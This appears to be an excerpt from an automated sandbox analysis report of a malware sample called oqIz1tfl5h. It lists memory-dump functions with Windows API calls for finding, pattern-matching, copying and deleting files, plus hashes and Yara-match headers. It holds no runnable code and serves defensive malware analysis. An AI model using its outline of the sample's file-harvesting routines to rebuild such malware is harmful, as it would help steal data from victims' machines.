                                            • Instruction Fuzzy Hash: 56F0347CA81309BAEB10EBE0DC88BFD767DAB47741F141A18A602A91D0CBB14140CA66
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: `o@
                                            • API String ID: 0-590292170
                                            • Opcode ID: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
                                            • Instruction ID: c65cc5113f4fbf7636557f8b1f026e9f2285814709fd8c8344c4410f81c0aea8
                                            • Opcode Fuzzy Hash: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
                                            • Instruction Fuzzy Hash: A66138B4900219EFCB14DF94E944BEEB7B1BB04304F1185AAE40A77380D739AEA4DF95
                                            APIs
                                              • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                            • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414BEA
                                            • lstrcatA.KERNEL32(?,02E298B8), ref: 00414C08
                                              • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                              • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                              • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                              • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                              • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                              • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                              • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                                              • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
                                              • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                                              • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                                              • Part of subcall function 00414910: lstrcatA.KERNEL32(?,02E26360,?,000003E8), ref: 00414A4A
                                              • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
                                              • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
                                              • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
                                              • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
                                              • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
                                              • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                                              • Part of subcall function 00414910: wsprintfA.USER32 ref: 00414A07
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                            • String ID: UaA
                                            • API String ID: 2104210347-3893042857
                                            • Opcode ID: 8ba6efb70901ca5478d437239848c433a21302fddde02a53de9488f6e8c4bcee
                                            • Instruction ID: 5a37e5a53a2562059c730f6b0b3ae842953eee94398a2728108a858f2c1bafc2
                                            • Opcode Fuzzy Hash: 8ba6efb70901ca5478d437239848c433a21302fddde02a53de9488f6e8c4bcee
                                            • Instruction Fuzzy Hash: 9341C5BA6001047BD754FBB0EC42EEE337DA785700F40851DB54A96186EE795BC88BA6
                                            APIs
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • GetSystemTime.KERNEL32(?,02DF4EB0,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: SystemTimelstrcpy
                                            • String ID: cI@$cI@
                                            • API String ID: 62757014-1697673767
                                            • Opcode ID: 728e3afec194442a0a20c9b4cf47b2a0a0f7365ad80767aaeb7a96b2b5f46ac6
                                            • Instruction ID: 15f3dfc6f8d56a301bf8b2a7a9260479b6db203ca669f730be279af5ebf73ee3
                                            • Opcode Fuzzy Hash: 728e3afec194442a0a20c9b4cf47b2a0a0f7365ad80767aaeb7a96b2b5f46ac6
                                            • Instruction Fuzzy Hash: 7111E971D00008AFCB04EFA9C8919EE77B9EF58314F04C05EF01667241DF38AA86CBA6
                                            APIs
                                              • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                            • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 0041508A
                                            • lstrcatA.KERNEL32(?,02E291D8), ref: 004150A8
                                              • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                              • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$FileFindFirstFolderPathwsprintf
                                            • String ID: aA
                                            • API String ID: 2699682494-2567749500
                                            • Opcode ID: d64dcdbc5a5b078ecf4a674937750308087945107cc9d2085dbcd85f67f2e6ce
                                            • Instruction ID: 27646669aa04729862e240b26620d37997e147c17b59a732ce93ef494e7ce50b
                                            • Opcode Fuzzy Hash: d64dcdbc5a5b078ecf4a674937750308087945107cc9d2085dbcd85f67f2e6ce
                                            • Instruction Fuzzy Hash: B801D6BAA4020877C714FBB0DC42EEE333CAB55304F00415DB68A570D1EE789AC88BA6
                                            APIs
                                              • Part of subcall function 0303A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0303A9EF
                                              • Part of subcall function 0303AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 0303AC2C
                                              • Part of subcall function 0303AC17: lstrcpy.KERNEL32(00000000), ref: 0303AC6B
                                              • Part of subcall function 0303AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0303AC79
                                              • Part of subcall function 0303AB87: lstrcpy.KERNEL32(00000000,?), ref: 0303ABD9
                                              • Part of subcall function 0303AB87: lstrcat.KERNEL32(00000000), ref: 0303ABE9
                                              • Part of subcall function 0303AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0303AB6C
                                              • Part of subcall function 0303AA07: lstrcpy.KERNEL32(?,00000000), ref: 0303AA4D
                                              • Part of subcall function 0302A077: memcmp.MSVCRT(?,00421264,00000003), ref: 0302A094
                                            • lstrlen.KERNEL32(00000000), ref: 0302BF06
                                              • Part of subcall function 03039097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 030390B9
                                            • StrStrA.SHLWAPI(00000000,004213E0), ref: 0302BF34
                                            • lstrlen.KERNEL32(00000000), ref: 0302C00C
                                            • lstrlen.KERNEL32(00000000), ref: 0302C020
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                            • String ID:
                                            • API String ID: 1440504306-0
                                            • Opcode ID: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                                            • Instruction ID: 0815e9da2c31bc1b33777845aed1a9c58d989bc9f270657abe0f7e419962b7eb
                                            • Opcode Fuzzy Hash: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                                            • Instruction Fuzzy Hash: 6BB1657AA11318ABCF08FBA0DD95EEE773DAF96201F444159E4466B0A0EF345B48CF61
                                            APIs
                                            • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
                                            • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                                            • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                                            • FindClose.KERNEL32(000000FF), ref: 00413C7C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$CloseFileNextlstrcat
                                            • String ID: !=A
                                            • API String ID: 3840410801-2919091325
                                            • Opcode ID: 28feb7c8be81de4ab4b55bfcc7f9479259f5a9bafbd7cecf7f5c2433705f41d5
                                            • Instruction ID: 20ec2b31cb4d991c835852fde49fc2354676703d0d5a57c203257a76fc367b8d
                                            • Opcode Fuzzy Hash: 28feb7c8be81de4ab4b55bfcc7f9479259f5a9bafbd7cecf7f5c2433705f41d5
                                            • Instruction Fuzzy Hash: FCD012756401096BCB20EF90DD589EA7779DB55305F0041C9B40EA6150EB399B818B95
                                            APIs
                                              • Part of subcall function 03039047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 03039072
                                            • lstrcat.KERNEL32(?,00000000), ref: 030351E1
                                            • lstrcat.KERNEL32(?,00421070), ref: 030351FE
                                            • lstrcat.KERNEL32(?,0064A5F8), ref: 03035212
                                            • lstrcat.KERNEL32(?,00421074), ref: 03035224
                                              • Part of subcall function 03034B77: wsprintfA.USER32 ref: 03034B93
                                              • Part of subcall function 03034B77: FindFirstFileA.KERNEL32(?,?), ref: 03034BAA
                                              • Part of subcall function 03034B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 03034BD8
                                              • Part of subcall function 03034B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 03034BEE
                                              • Part of subcall function 03034B77: FindNextFileA.KERNEL32(000000FF,?), ref: 03034DE4
                                              • Part of subcall function 03034B77: FindClose.KERNEL32(000000FF), ref: 03034DF9
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                            • String ID:
                                            • API String ID: 2667927680-0
                                            • Opcode ID: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                                            • Instruction ID: 66db1827f48a196cb9a35669b22a91d82e7fbd2fbfdba9c92094cfc8c76ddb16
                                            • Opcode Fuzzy Hash: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                                            • Instruction Fuzzy Hash: 9121C87EA403187BC714FBF0DC45EEA377DABD6300F404188B6859A180DE7496C98BA2
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpynlstrlenwsprintf
                                            • String ID:
                                            • API String ID: 1206339513-0
                                            • Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                            • Instruction ID: dfd1c8c2edab6b5f7af013b0e4bba9670bafa03ea1767c3e50c38e27e1a1c94d
                                            • Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                            • Instruction Fuzzy Hash: F7011A79640108FFCB04DFECD988EAE7BBAEF49394F108148F9098B300C631AA40CB91